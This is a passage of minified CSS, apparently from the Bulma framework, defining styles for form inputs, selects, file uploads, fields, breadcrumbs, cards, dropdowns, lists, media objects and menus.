select,.textarea{background-color:#fff;border-color:#dbdbdb;border-radius:4px;color:#363636}.input::-moz-placeholder,.select 
select::-moz-placeholder,.textarea::-moz-placeholder{color:rgba(54,54,54,.3)}.input::-webkit-input-placeholder,.select select::-webkit-input-placeholder,.textarea::-webkit-input-placeholder{color:rgba(54,54,54,.3)}.input:-moz-placeholder,.select select:-moz-placeholder,.textarea:-moz-placeholder{color:rgba(54,54,54,.3)}.input:-ms-input-placeholder,.select select:-ms-input-placeholder,.textarea:-ms-input-placeholder{color:rgba(54,54,54,.3)}.input:hover,.is-hovered.input,.is-hovered.textarea,.select select.is-hovered,.select select:hover,.textarea:hover{border-color:#b5b5b5}.input:active,.input:focus,.is-active.input,.is-active.textarea,.is-focused.input,.is-focused.textarea,.select select.is-active,.select select.is-focused,.select select:active,.select select:focus,.textarea:active,.textarea:focus{border-color:#3273dc;box-shadow:0 0 0 .125em rgba(50,115,220,.25)}.input[disabled],.select fieldset[disabled] select,.select select[disabled],.textarea[disabled],fieldset[disabled] .input,fieldset[disabled] .select select,fieldset[disabled] .textarea{background-color:#f5f5f5;border-color:#f5f5f5;box-shadow:none;color:#7a7a7a}.input[disabled]::-moz-placeholder,.select fieldset[disabled] select::-moz-placeholder,.select select[disabled]::-moz-placeholder,.textarea[disabled]::-moz-placeholder,fieldset[disabled] .input::-moz-placeholder,fieldset[disabled] .select select::-moz-placeholder,fieldset[disabled] .textarea::-moz-placeholder{color:rgba(122,122,122,.3)}.input[disabled]::-webkit-input-placeholder,.select fieldset[disabled] select::-webkit-input-placeholder,.select select[disabled]::-webkit-input-placeholder,.textarea[disabled]::-webkit-input-placeholder,fieldset[disabled] .input::-webkit-input-placeholder,fieldset[disabled] .select select::-webkit-input-placeholder,fieldset[disabled] .textarea::-webkit-input-placeholder{color:rgba(122,122,122,.3)}.input[disabled]:-moz-placeholder,.select fieldset[disabled] select:-moz-placeholder,.select 
select[disabled]:-moz-placeholder,.textarea[disabled]:-moz-placeholder,fieldset[disabled] .input:-moz-placeholder,fieldset[disabled] .select select:-moz-placeholder,fieldset[disabled] .textarea:-moz-placeholder{color:rgba(122,122,122,.3)}.input[disabled]:-ms-input-placeholder,.select fieldset[disabled] select:-ms-input-placeholder,.select select[disabled]:-ms-input-placeholder,.textarea[disabled]:-ms-input-placeholder,fieldset[disabled] .input:-ms-input-placeholder,fieldset[disabled] .select select:-ms-input-placeholder,fieldset[disabled] .textarea:-ms-input-placeholder{color:rgba(122,122,122,.3)}.input,.textarea{box-shadow:inset 0 .0625em .125em rgba(10,10,10,.05);max-width:100%;width:100%}.input[readonly],.textarea[readonly]{box-shadow:none}.is-white.input,.is-white.textarea{border-color:#fff}.is-white.input:active,.is-white.input:focus,.is-white.is-active.input,.is-white.is-active.textarea,.is-white.is-focused.input,.is-white.is-focused.textarea,.is-white.textarea:active,.is-white.textarea:focus{box-shadow:0 0 0 .125em rgba(255,255,255,.25)}.is-black.input,.is-black.textarea{border-color:#0a0a0a}.is-black.input:active,.is-black.input:focus,.is-black.is-active.input,.is-black.is-active.textarea,.is-black.is-focused.input,.is-black.is-focused.textarea,.is-black.textarea:active,.is-black.textarea:focus{box-shadow:0 0 0 .125em rgba(10,10,10,.25)}.is-light.input,.is-light.textarea{border-color:#f5f5f5}.is-light.input:active,.is-light.input:focus,.is-light.is-active.input,.is-light.is-active.textarea,.is-light.is-focused.input,.is-light.is-focused.textarea,.is-light.textarea:active,.is-light.textarea:focus{box-shadow:0 0 0 .125em rgba(245,245,245,.25)}.is-dark.input,.is-dark.textarea{border-color:#363636}.is-dark.input:active,.is-dark.input:focus,.is-dark.is-active.input,.is-dark.is-active.textarea,.is-dark.is-focused.input,.is-dark.is-focused.textarea,.is-dark.textarea:active,.is-dark.textarea:focus{box-shadow:0 0 0 .125em 
rgba(54,54,54,.25)}.is-primary.input,.is-primary.textarea{border-color:#00d1b2}.is-primary.input:active,.is-primary.input:focus,.is-primary.is-active.input,.is-primary.is-active.textarea,.is-primary.is-focused.input,.is-primary.is-focused.textarea,.is-primary.textarea:active,.is-primary.textarea:focus{box-shadow:0 0 0 .125em rgba(0,209,178,.25)}.is-link.input,.is-link.textarea{border-color:#3273dc}.is-link.input:active,.is-link.input:focus,.is-link.is-active.input,.is-link.is-active.textarea,.is-link.is-focused.input,.is-link.is-focused.textarea,.is-link.textarea:active,.is-link.textarea:focus{box-shadow:0 0 0 .125em rgba(50,115,220,.25)}.is-info.input,.is-info.textarea{border-color:#3298dc}.is-info.input:active,.is-info.input:focus,.is-info.is-active.input,.is-info.is-active.textarea,.is-info.is-focused.input,.is-info.is-focused.textarea,.is-info.textarea:active,.is-info.textarea:focus{box-shadow:0 0 0 .125em rgba(50,152,220,.25)}.is-success.input,.is-success.textarea{border-color:#48c774}.is-success.input:active,.is-success.input:focus,.is-success.is-active.input,.is-success.is-active.textarea,.is-success.is-focused.input,.is-success.is-focused.textarea,.is-success.textarea:active,.is-success.textarea:focus{box-shadow:0 0 0 .125em rgba(72,199,116,.25)}.is-warning.input,.is-warning.textarea{border-color:#ffdd57}.is-warning.input:active,.is-warning.input:focus,.is-warning.is-active.input,.is-warning.is-active.textarea,.is-warning.is-focused.input,.is-warning.is-focused.textarea,.is-warning.textarea:active,.is-warning.textarea:focus{box-shadow:0 0 0 .125em rgba(255,221,87,.25)}.is-danger.input,.is-danger.textarea{border-color:#f14668}.is-danger.input:active,.is-danger.input:focus,.is-danger.is-active.input,.is-danger.is-active.textarea,.is-danger.is-focused.input,.is-danger.is-focused.textarea,.is-danger.textarea:active,.is-danger.textarea:focus{box-shadow:0 0 0 .125em 
rgba(241,70,104,.25)}.is-small.input,.is-small.textarea{border-radius:2px;font-size:.75rem}.is-medium.input,.is-medium.textarea{font-size:1.25rem}.is-large.input,.is-large.textarea{font-size:1.5rem}.is-fullwidth.input,.is-fullwidth.textarea{display:block;width:100%}.is-inline.input,.is-inline.textarea{display:inline;width:auto}.input.is-rounded{border-radius:290486px;padding-left:calc(calc(.75em - 1px) + .375em);padding-right:calc(calc(.75em - 1px) + .375em)}.input.is-static{background-color:transparent;border-color:transparent;box-shadow:none;padding-left:0;padding-right:0}.textarea{display:block;max-width:100%;min-width:100%;padding:calc(.75em - 1px);resize:vertical}.textarea:not([rows]){max-height:40em;min-height:8em}.textarea[rows]{height:initial}.textarea.has-fixed-size{resize:none}.checkbox,.radio{cursor:pointer;display:inline-block;line-height:1.25;position:relative}.checkbox input,.radio input{cursor:pointer}.checkbox:hover,.radio:hover{color:#363636}.checkbox[disabled],.radio[disabled],fieldset[disabled] .checkbox,fieldset[disabled] .radio{color:#7a7a7a;cursor:not-allowed}.radio+.radio{margin-left:.5em}.select{display:inline-block;max-width:100%;position:relative;vertical-align:top}.select:not(.is-multiple){height:2.5em}.select:not(.is-multiple):not(.is-loading)::after{border-color:#3273dc;right:1.125em;z-index:4}.select.is-rounded select{border-radius:290486px;padding-left:1em}.select select{cursor:pointer;display:block;font-size:1em;max-width:100%;outline:0}.select select::-ms-expand{display:none}.select select[disabled]:hover,fieldset[disabled] .select select:hover{border-color:#f5f5f5}.select select:not([multiple]){padding-right:2.5em}.select select[multiple]{height:auto;padding:0}.select select[multiple] option{padding:.5em 1em}.select:not(.is-multiple):not(.is-loading):hover::after{border-color:#363636}.select.is-white:not(:hover)::after{border-color:#fff}.select.is-white select{border-color:#fff}.select.is-white select.is-hovered,.select.is-white 
select:hover{border-color:#f2f2f2}.select.is-white select.is-active,.select.is-white select.is-focused,.select.is-white select:active,.select.is-white select:focus{box-shadow:0 0 0 .125em rgba(255,255,255,.25)}.select.is-black:not(:hover)::after{border-color:#0a0a0a}.select.is-black select{border-color:#0a0a0a}.select.is-black select.is-hovered,.select.is-black select:hover{border-color:#000}.select.is-black select.is-active,.select.is-black select.is-focused,.select.is-black select:active,.select.is-black select:focus{box-shadow:0 0 0 .125em rgba(10,10,10,.25)}.select.is-light:not(:hover)::after{border-color:#f5f5f5}.select.is-light select{border-color:#f5f5f5}.select.is-light select.is-hovered,.select.is-light select:hover{border-color:#e8e8e8}.select.is-light select.is-active,.select.is-light select.is-focused,.select.is-light select:active,.select.is-light select:focus{box-shadow:0 0 0 .125em rgba(245,245,245,.25)}.select.is-dark:not(:hover)::after{border-color:#363636}.select.is-dark select{border-color:#363636}.select.is-dark select.is-hovered,.select.is-dark select:hover{border-color:#292929}.select.is-dark select.is-active,.select.is-dark select.is-focused,.select.is-dark select:active,.select.is-dark select:focus{box-shadow:0 0 0 .125em rgba(54,54,54,.25)}.select.is-primary:not(:hover)::after{border-color:#00d1b2}.select.is-primary select{border-color:#00d1b2}.select.is-primary select.is-hovered,.select.is-primary select:hover{border-color:#00b89c}.select.is-primary select.is-active,.select.is-primary select.is-focused,.select.is-primary select:active,.select.is-primary select:focus{box-shadow:0 0 0 .125em rgba(0,209,178,.25)}.select.is-link:not(:hover)::after{border-color:#3273dc}.select.is-link select{border-color:#3273dc}.select.is-link select.is-hovered,.select.is-link select:hover{border-color:#2366d1}.select.is-link select.is-active,.select.is-link select.is-focused,.select.is-link select:active,.select.is-link select:focus{box-shadow:0 0 0 .125em 
rgba(50,115,220,.25)}.select.is-info:not(:hover)::after{border-color:#3298dc}.select.is-info select{border-color:#3298dc}.select.is-info select.is-hovered,.select.is-info select:hover{border-color:#238cd1}.select.is-info select.is-active,.select.is-info select.is-focused,.select.is-info select:active,.select.is-info select:focus{box-shadow:0 0 0 .125em rgba(50,152,220,.25)}.select.is-success:not(:hover)::after{border-color:#48c774}.select.is-success select{border-color:#48c774}.select.is-success select.is-hovered,.select.is-success select:hover{border-color:#3abb67}.select.is-success select.is-active,.select.is-success select.is-focused,.select.is-success select:active,.select.is-success select:focus{box-shadow:0 0 0 .125em rgba(72,199,116,.25)}.select.is-warning:not(:hover)::after{border-color:#ffdd57}.select.is-warning select{border-color:#ffdd57}.select.is-warning select.is-hovered,.select.is-warning select:hover{border-color:#ffd83d}.select.is-warning select.is-active,.select.is-warning select.is-focused,.select.is-warning select:active,.select.is-warning select:focus{box-shadow:0 0 0 .125em rgba(255,221,87,.25)}.select.is-danger:not(:hover)::after{border-color:#f14668}.select.is-danger select{border-color:#f14668}.select.is-danger select.is-hovered,.select.is-danger select:hover{border-color:#ef2e55}.select.is-danger select.is-active,.select.is-danger select.is-focused,.select.is-danger select:active,.select.is-danger select:focus{box-shadow:0 0 0 .125em rgba(241,70,104,.25)}.select.is-small{border-radius:2px;font-size:.75rem}.select.is-medium{font-size:1.25rem}.select.is-large{font-size:1.5rem}.select.is-disabled::after{border-color:#7a7a7a}.select.is-fullwidth{width:100%}.select.is-fullwidth 
select{width:100%}.select.is-loading::after{margin-top:0;position:absolute;right:.625em;top:.625em;transform:none}.select.is-loading.is-small:after{font-size:.75rem}.select.is-loading.is-medium:after{font-size:1.25rem}.select.is-loading.is-large:after{font-size:1.5rem}.file{align-items:stretch;display:flex;justify-content:flex-start;position:relative}.file.is-white .file-cta{background-color:#fff;border-color:transparent;color:#0a0a0a}.file.is-white.is-hovered .file-cta,.file.is-white:hover .file-cta{background-color:#f9f9f9;border-color:transparent;color:#0a0a0a}.file.is-white.is-focused .file-cta,.file.is-white:focus .file-cta{border-color:transparent;box-shadow:0 0 .5em rgba(255,255,255,.25);color:#0a0a0a}.file.is-white.is-active .file-cta,.file.is-white:active .file-cta{background-color:#f2f2f2;border-color:transparent;color:#0a0a0a}.file.is-black .file-cta{background-color:#0a0a0a;border-color:transparent;color:#fff}.file.is-black.is-hovered .file-cta,.file.is-black:hover .file-cta{background-color:#040404;border-color:transparent;color:#fff}.file.is-black.is-focused .file-cta,.file.is-black:focus .file-cta{border-color:transparent;box-shadow:0 0 .5em rgba(10,10,10,.25);color:#fff}.file.is-black.is-active .file-cta,.file.is-black:active .file-cta{background-color:#000;border-color:transparent;color:#fff}.file.is-light .file-cta{background-color:#f5f5f5;border-color:transparent;color:rgba(0,0,0,.7)}.file.is-light.is-hovered .file-cta,.file.is-light:hover .file-cta{background-color:#eee;border-color:transparent;color:rgba(0,0,0,.7)}.file.is-light.is-focused .file-cta,.file.is-light:focus .file-cta{border-color:transparent;box-shadow:0 0 .5em rgba(245,245,245,.25);color:rgba(0,0,0,.7)}.file.is-light.is-active .file-cta,.file.is-light:active .file-cta{background-color:#e8e8e8;border-color:transparent;color:rgba(0,0,0,.7)}.file.is-dark .file-cta{background-color:#363636;border-color:transparent;color:#fff}.file.is-dark.is-hovered .file-cta,.file.is-dark:hover 
.file-cta{background-color:#2f2f2f;border-color:transparent;color:#fff}.file.is-dark.is-focused .file-cta,.file.is-dark:focus .file-cta{border-color:transparent;box-shadow:0 0 .5em rgba(54,54,54,.25);color:#fff}.file.is-dark.is-active .file-cta,.file.is-dark:active .file-cta{background-color:#292929;border-color:transparent;color:#fff}.file.is-primary .file-cta{background-color:#00d1b2;border-color:transparent;color:#fff}.file.is-primary.is-hovered .file-cta,.file.is-primary:hover .file-cta{background-color:#00c4a7;border-color:transparent;color:#fff}.file.is-primary.is-focused .file-cta,.file.is-primary:focus .file-cta{border-color:transparent;box-shadow:0 0 .5em rgba(0,209,178,.25);color:#fff}.file.is-primary.is-active .file-cta,.file.is-primary:active .file-cta{background-color:#00b89c;border-color:transparent;color:#fff}.file.is-link .file-cta{background-color:#3273dc;border-color:transparent;color:#fff}.file.is-link.is-hovered .file-cta,.file.is-link:hover .file-cta{background-color:#276cda;border-color:transparent;color:#fff}.file.is-link.is-focused .file-cta,.file.is-link:focus .file-cta{border-color:transparent;box-shadow:0 0 .5em rgba(50,115,220,.25);color:#fff}.file.is-link.is-active .file-cta,.file.is-link:active .file-cta{background-color:#2366d1;border-color:transparent;color:#fff}.file.is-info .file-cta{background-color:#3298dc;border-color:transparent;color:#fff}.file.is-info.is-hovered .file-cta,.file.is-info:hover .file-cta{background-color:#2793da;border-color:transparent;color:#fff}.file.is-info.is-focused .file-cta,.file.is-info:focus .file-cta{border-color:transparent;box-shadow:0 0 .5em rgba(50,152,220,.25);color:#fff}.file.is-info.is-active .file-cta,.file.is-info:active .file-cta{background-color:#238cd1;border-color:transparent;color:#fff}.file.is-success .file-cta{background-color:#48c774;border-color:transparent;color:#fff}.file.is-success.is-hovered .file-cta,.file.is-success:hover 
.file-cta{background-color:#3ec46d;border-color:transparent;color:#fff}.file.is-success.is-focused .file-cta,.file.is-success:focus .file-cta{border-color:transparent;box-shadow:0 0 .5em rgba(72,199,116,.25);color:#fff}.file.is-success.is-active .file-cta,.file.is-success:active .file-cta{background-color:#3abb67;border-color:transparent;color:#fff}.file.is-warning .file-cta{background-color:#ffdd57;border-color:transparent;color:rgba(0,0,0,.7)}.file.is-warning.is-hovered .file-cta,.file.is-warning:hover .file-cta{background-color:#ffdb4a;border-color:transparent;color:rgba(0,0,0,.7)}.file.is-warning.is-focused .file-cta,.file.is-warning:focus .file-cta{border-color:transparent;box-shadow:0 0 .5em rgba(255,221,87,.25);color:rgba(0,0,0,.7)}.file.is-warning.is-active .file-cta,.file.is-warning:active .file-cta{background-color:#ffd83d;border-color:transparent;color:rgba(0,0,0,.7)}.file.is-danger .file-cta{background-color:#f14668;border-color:transparent;color:#fff}.file.is-danger.is-hovered .file-cta,.file.is-danger:hover .file-cta{background-color:#f03a5f;border-color:transparent;color:#fff}.file.is-danger.is-focused .file-cta,.file.is-danger:focus .file-cta{border-color:transparent;box-shadow:0 0 .5em rgba(241,70,104,.25);color:#fff}.file.is-danger.is-active .file-cta,.file.is-danger:active .file-cta{background-color:#ef2e55;border-color:transparent;color:#fff}.file.is-small{font-size:.75rem}.file.is-medium{font-size:1.25rem}.file.is-medium .file-icon .fa{font-size:21px}.file.is-large{font-size:1.5rem}.file.is-large .file-icon .fa{font-size:28px}.file.has-name .file-cta{border-bottom-right-radius:0;border-top-right-radius:0}.file.has-name .file-name{border-bottom-left-radius:0;border-top-left-radius:0}.file.has-name.is-empty .file-cta{border-radius:4px}.file.has-name.is-empty .file-name{display:none}.file.is-boxed .file-label{flex-direction:column}.file.is-boxed .file-cta{flex-direction:column;height:auto;padding:1em 3em}.file.is-boxed .file-name{border-width:0 
1px 1px}.file.is-boxed .file-icon{height:1.5em;width:1.5em}.file.is-boxed .file-icon .fa{font-size:21px}.file.is-boxed.is-small .file-icon .fa{font-size:14px}.file.is-boxed.is-medium .file-icon .fa{font-size:28px}.file.is-boxed.is-large .file-icon .fa{font-size:35px}.file.is-boxed.has-name .file-cta{border-radius:4px 4px 0 0}.file.is-boxed.has-name .file-name{border-radius:0 0 4px 4px;border-width:0 1px 1px}.file.is-centered{justify-content:center}.file.is-fullwidth .file-label{width:100%}.file.is-fullwidth .file-name{flex-grow:1;max-width:none}.file.is-right{justify-content:flex-end}.file.is-right .file-cta{border-radius:0 4px 4px 0}.file.is-right .file-name{border-radius:4px 0 0 4px;border-width:1px 0 1px 1px;order:-1}.file-label{align-items:stretch;display:flex;cursor:pointer;justify-content:flex-start;overflow:hidden;position:relative}.file-label:hover .file-cta{background-color:#eee;color:#363636}.file-label:hover .file-name{border-color:#d5d5d5}.file-label:active .file-cta{background-color:#e8e8e8;color:#363636}.file-label:active .file-name{border-color:#cfcfcf}.file-input{height:100%;left:0;opacity:0;outline:0;position:absolute;top:0;width:100%}.file-cta,.file-name{border-color:#dbdbdb;border-radius:4px;font-size:1em;padding-left:1em;padding-right:1em;white-space:nowrap}.file-cta{background-color:#f5f5f5;color:#4a4a4a}.file-name{border-color:#dbdbdb;border-style:solid;border-width:1px 1px 1px 0;display:block;max-width:16em;overflow:hidden;text-align:left;text-overflow:ellipsis}.file-icon{align-items:center;display:flex;height:1em;justify-content:center;margin-right:.5em;width:1em}.file-icon 
.fa{font-size:14px}.label{color:#363636;display:block;font-size:1rem;font-weight:700}.label:not(:last-child){margin-bottom:.5em}.label.is-small{font-size:.75rem}.label.is-medium{font-size:1.25rem}.label.is-large{font-size:1.5rem}.help{display:block;font-size:.75rem;margin-top:.25rem}.help.is-white{color:#fff}.help.is-black{color:#0a0a0a}.help.is-light{color:#f5f5f5}.help.is-dark{color:#363636}.help.is-primary{color:#00d1b2}.help.is-link{color:#3273dc}.help.is-info{color:#3298dc}.help.is-success{color:#48c774}.help.is-warning{color:#ffdd57}.help.is-danger{color:#f14668}.field:not(:last-child){margin-bottom:.75rem}.field.has-addons{display:flex;justify-content:flex-start}.field.has-addons .control:not(:last-child){margin-right:-1px}.field.has-addons .control:not(:first-child):not(:last-child) .button,.field.has-addons .control:not(:first-child):not(:last-child) .input,.field.has-addons .control:not(:first-child):not(:last-child) .select select{border-radius:0}.field.has-addons .control:first-child:not(:only-child) .button,.field.has-addons .control:first-child:not(:only-child) .input,.field.has-addons .control:first-child:not(:only-child) .select select{border-bottom-right-radius:0;border-top-right-radius:0}.field.has-addons .control:last-child:not(:only-child) .button,.field.has-addons .control:last-child:not(:only-child) .input,.field.has-addons .control:last-child:not(:only-child) .select select{border-bottom-left-radius:0;border-top-left-radius:0}.field.has-addons .control .button:not([disabled]).is-hovered,.field.has-addons .control .button:not([disabled]):hover,.field.has-addons .control .input:not([disabled]).is-hovered,.field.has-addons .control .input:not([disabled]):hover,.field.has-addons .control .select select:not([disabled]).is-hovered,.field.has-addons .control .select select:not([disabled]):hover{z-index:2}.field.has-addons .control .button:not([disabled]).is-active,.field.has-addons .control .button:not([disabled]).is-focused,.field.has-addons 
.control .button:not([disabled]):active,.field.has-addons .control .button:not([disabled]):focus,.field.has-addons .control .input:not([disabled]).is-active,.field.has-addons .control .input:not([disabled]).is-focused,.field.has-addons .control .input:not([disabled]):active,.field.has-addons .control .input:not([disabled]):focus,.field.has-addons .control .select select:not([disabled]).is-active,.field.has-addons .control .select select:not([disabled]).is-focused,.field.has-addons .control .select select:not([disabled]):active,.field.has-addons .control .select select:not([disabled]):focus{z-index:3}.field.has-addons .control .button:not([disabled]).is-active:hover,.field.has-addons .control .button:not([disabled]).is-focused:hover,.field.has-addons .control .button:not([disabled]):active:hover,.field.has-addons .control .button:not([disabled]):focus:hover,.field.has-addons .control .input:not([disabled]).is-active:hover,.field.has-addons .control .input:not([disabled]).is-focused:hover,.field.has-addons .control .input:not([disabled]):active:hover,.field.has-addons .control .input:not([disabled]):focus:hover,.field.has-addons .control .select select:not([disabled]).is-active:hover,.field.has-addons .control .select select:not([disabled]).is-focused:hover,.field.has-addons .control .select select:not([disabled]):active:hover,.field.has-addons .control .select select:not([disabled]):focus:hover{z-index:4}.field.has-addons .control.is-expanded{flex-grow:1;flex-shrink:1}.field.has-addons.has-addons-centered{justify-content:center}.field.has-addons.has-addons-right{justify-content:flex-end}.field.has-addons.has-addons-fullwidth 
.control{flex-grow:1;flex-shrink:0}.field.is-grouped{display:flex;justify-content:flex-start}.field.is-grouped>.control{flex-shrink:0}.field.is-grouped>.control:not(:last-child){margin-bottom:0;margin-right:.75rem}.field.is-grouped>.control.is-expanded{flex-grow:1;flex-shrink:1}.field.is-grouped.is-grouped-centered{justify-content:center}.field.is-grouped.is-grouped-right{justify-content:flex-end}.field.is-grouped.is-grouped-multiline{flex-wrap:wrap}.field.is-grouped.is-grouped-multiline>.control:last-child,.field.is-grouped.is-grouped-multiline>.control:not(:last-child){margin-bottom:.75rem}.field.is-grouped.is-grouped-multiline:last-child{margin-bottom:-.75rem}.field.is-grouped.is-grouped-multiline:not(:last-child){margin-bottom:0}@media screen and (min-width:769px),print{.field.is-horizontal{display:flex}}.field-label .label{font-size:inherit}@media screen and (max-width:768px){.field-label{margin-bottom:.5rem}}@media screen and (min-width:769px),print{.field-label{flex-basis:0;flex-grow:1;flex-shrink:0;margin-right:1.5rem;text-align:right}.field-label.is-small{font-size:.75rem;padding-top:.375em}.field-label.is-normal{padding-top:.375em}.field-label.is-medium{font-size:1.25rem;padding-top:.375em}.field-label.is-large{font-size:1.5rem;padding-top:.375em}}.field-body .field .field{margin-bottom:0}@media screen and (min-width:769px),print{.field-body{display:flex;flex-basis:0;flex-grow:5;flex-shrink:1}.field-body .field{margin-bottom:0}.field-body>.field{flex-shrink:1}.field-body>.field:not(.is-narrow){flex-grow:1}.field-body>.field:not(:last-child){margin-right:.75rem}}.control{box-sizing:border-box;clear:both;font-size:1rem;position:relative;text-align:left}.control.has-icons-left .input:focus~.icon,.control.has-icons-left .select:focus~.icon,.control.has-icons-right .input:focus~.icon,.control.has-icons-right .select:focus~.icon{color:#4a4a4a}.control.has-icons-left .input.is-small~.icon,.control.has-icons-left .select.is-small~.icon,.control.has-icons-right 
.input.is-small~.icon,.control.has-icons-right .select.is-small~.icon{font-size:.75rem}.control.has-icons-left .input.is-medium~.icon,.control.has-icons-left .select.is-medium~.icon,.control.has-icons-right .input.is-medium~.icon,.control.has-icons-right .select.is-medium~.icon{font-size:1.25rem}.control.has-icons-left .input.is-large~.icon,.control.has-icons-left .select.is-large~.icon,.control.has-icons-right .input.is-large~.icon,.control.has-icons-right .select.is-large~.icon{font-size:1.5rem}.control.has-icons-left .icon,.control.has-icons-right .icon{color:#dbdbdb;height:2.5em;pointer-events:none;position:absolute;top:0;width:2.5em;z-index:4}.control.has-icons-left .input,.control.has-icons-left .select select{padding-left:2.5em}.control.has-icons-left .icon.is-left{left:0}.control.has-icons-right .input,.control.has-icons-right .select select{padding-right:2.5em}.control.has-icons-right .icon.is-right{right:0}.control.is-loading::after{position:absolute!important;right:.625em;top:.625em;z-index:4}.control.is-loading.is-small:after{font-size:.75rem}.control.is-loading.is-medium:after{font-size:1.25rem}.control.is-loading.is-large:after{font-size:1.5rem}.breadcrumb{font-size:1rem;white-space:nowrap}.breadcrumb a{align-items:center;color:#3273dc;display:flex;justify-content:center;padding:0 .75em}.breadcrumb a:hover{color:#363636}.breadcrumb li{align-items:center;display:flex}.breadcrumb li:first-child a{padding-left:0}.breadcrumb li.is-active a{color:#363636;cursor:default;pointer-events:none}.breadcrumb li+li::before{color:#b5b5b5;content:"\0002f"}.breadcrumb ol,.breadcrumb ul{align-items:flex-start;display:flex;flex-wrap:wrap;justify-content:flex-start}.breadcrumb .icon:first-child{margin-right:.5em}.breadcrumb .icon:last-child{margin-left:.5em}.breadcrumb.is-centered ol,.breadcrumb.is-centered ul{justify-content:center}.breadcrumb.is-right ol,.breadcrumb.is-right 
ul{justify-content:flex-end}.breadcrumb.is-small{font-size:.75rem}.breadcrumb.is-medium{font-size:1.25rem}.breadcrumb.is-large{font-size:1.5rem}.breadcrumb.has-arrow-separator li+li::before{content:"\02192"}.breadcrumb.has-bullet-separator li+li::before{content:"\02022"}.breadcrumb.has-dot-separator li+li::before{content:"\000b7"}.breadcrumb.has-succeeds-separator li+li::before{content:"\0227B"}.card{background-color:#fff;box-shadow:0 .5em 1em -.125em rgba(10,10,10,.1),0 0 0 1px rgba(10,10,10,.02);color:#4a4a4a;max-width:100%;position:relative}.card-header{background-color:transparent;align-items:stretch;box-shadow:0 .125em .25em rgba(10,10,10,.1);display:flex}.card-header-title{align-items:center;color:#363636;display:flex;flex-grow:1;font-weight:700;padding:.75rem 1rem}.card-header-title.is-centered{justify-content:center}.card-header-icon{align-items:center;cursor:pointer;display:flex;justify-content:center;padding:.75rem 1rem}.card-image{display:block;position:relative}.card-content{background-color:transparent;padding:1.5rem}.card-footer{background-color:transparent;border-top:1px solid #ededed;align-items:stretch;display:flex}.card-footer-item{align-items:center;display:flex;flex-basis:0;flex-grow:1;flex-shrink:0;justify-content:center;padding:.75rem}.card-footer-item:not(:last-child){border-right:1px solid #ededed}.card .media:not(:last-child){margin-bottom:1.5rem}.dropdown{display:inline-flex;position:relative;vertical-align:top}.dropdown.is-active .dropdown-menu,.dropdown.is-hoverable:hover .dropdown-menu{display:block}.dropdown.is-right .dropdown-menu{left:auto;right:0}.dropdown.is-up .dropdown-menu{bottom:100%;padding-bottom:4px;padding-top:initial;top:auto}.dropdown-menu{display:none;left:0;min-width:12rem;padding-top:4px;position:absolute;top:100%;z-index:20}.dropdown-content{background-color:#fff;border-radius:4px;box-shadow:0 .5em 1em -.125em rgba(10,10,10,.1),0 0 0 1px 
rgba(10,10,10,.02);padding-bottom:.5rem;padding-top:.5rem}/* ^ tail of a rule whose selector precedes this chunk — do not edit in isolation *//* Dropdown: items, hover/active states, divider */.dropdown-item{color:#4a4a4a;display:block;font-size:.875rem;line-height:1.5;padding:.375rem 1rem;position:relative}a.dropdown-item,button.dropdown-item{padding-right:3rem;text-align:left;white-space:nowrap;width:100%}a.dropdown-item:hover,button.dropdown-item:hover{background-color:#f5f5f5;color:#0a0a0a}a.dropdown-item.is-active,button.dropdown-item.is-active{background-color:#3273dc;color:#fff}.dropdown-divider{background-color:#ededed;border:none;display:block;height:1px;margin:.5rem 0}/* Level: horizontal flex layout; mobile stays flex, desktop (>=769px) enables it */.level{align-items:center;justify-content:space-between}.level code{border-radius:4px}.level img{display:inline-block;vertical-align:top}.level.is-mobile{display:flex}.level.is-mobile .level-left,.level.is-mobile .level-right{display:flex}.level.is-mobile .level-left+.level-right{margin-top:0}.level.is-mobile .level-item:not(:last-child){margin-bottom:0;margin-right:.75rem}.level.is-mobile .level-item:not(.is-narrow){flex-grow:1}@media screen and (min-width:769px),print{.level{display:flex}.level>.level-item:not(.is-narrow){flex-grow:1}}.level-item{align-items:center;display:flex;flex-basis:auto;flex-grow:0;flex-shrink:0;justify-content:center}.level-item .subtitle,.level-item .title{margin-bottom:0}@media screen and (max-width:768px){.level-item:not(:last-child){margin-bottom:.75rem}}.level-left,.level-right{flex-basis:auto;flex-grow:0;flex-shrink:0}.level-left .level-item.is-flexible,.level-right .level-item.is-flexible{flex-grow:1}@media screen and (min-width:769px),print{.level-left .level-item:not(:last-child),.level-right .level-item:not(:last-child){margin-right:.75rem}}.level-left{align-items:center;justify-content:flex-start}@media screen and (max-width:768px){.level-left+.level-right{margin-top:1.5rem}}@media screen and (min-width:769px),print{.level-left{display:flex}}.level-right{align-items:center;justify-content:flex-end}@media screen and 
(min-width:769px),print{.level-right{display:flex}}/* List: boxed item list with rounded first/last items */.list{background-color:#fff;border-radius:4px;box-shadow:0 2px 3px rgba(10,10,10,.1),0 0 0 1px rgba(10,10,10,.1)}.list-item{display:block;padding:.5em 1em}.list-item:not(a){color:#4a4a4a}.list-item:first-child{border-top-left-radius:4px;border-top-right-radius:4px}.list-item:last-child{border-bottom-left-radius:4px;border-bottom-right-radius:4px}.list-item:not(:last-child){border-bottom:1px solid #dbdbdb}.list-item.is-active{background-color:#3273dc;color:#fff}a.list-item{background-color:#f5f5f5;cursor:pointer}/* Media object: nestable figure + content layout */.media{align-items:flex-start;display:flex;text-align:left}.media .content:not(:last-child){margin-bottom:.75rem}.media .media{border-top:1px solid rgba(219,219,219,.5);display:flex;padding-top:.75rem}.media .media .content:not(:last-child),.media .media .control:not(:last-child){margin-bottom:.5rem}.media .media .media{padding-top:.5rem}.media .media .media+.media{margin-top:.5rem}.media+.media{border-top:1px solid rgba(219,219,219,.5);margin-top:1rem;padding-top:1rem}.media.is-large+.media{margin-top:1.5rem;padding-top:1.5rem}.media-left,.media-right{flex-basis:auto;flex-grow:0;flex-shrink:0}.media-left{margin-right:1rem}.media-right{margin-left:1rem}.media-content{flex-basis:auto;flex-grow:1;flex-shrink:1;text-align:left}@media screen and (max-width:768px){.media-content{overflow-x:auto}}/* Menu: vertical navigation list with size modifiers */.menu{font-size:1rem}.menu.is-small{font-size:.75rem}.menu.is-medium{font-size:1.25rem}.menu.is-large{font-size:1.5rem}.menu-list{line-height:1.25}.menu-list a{border-radius:2px;color:#4a4a4a;display:block;padding:.5em .75em}.menu-list a:hover{background-color:#f5f5f5;color:#363636}.menu-list a.is-active{background-color:#3273dc;color:#fff}.menu-list li ul{border-left:1px solid 
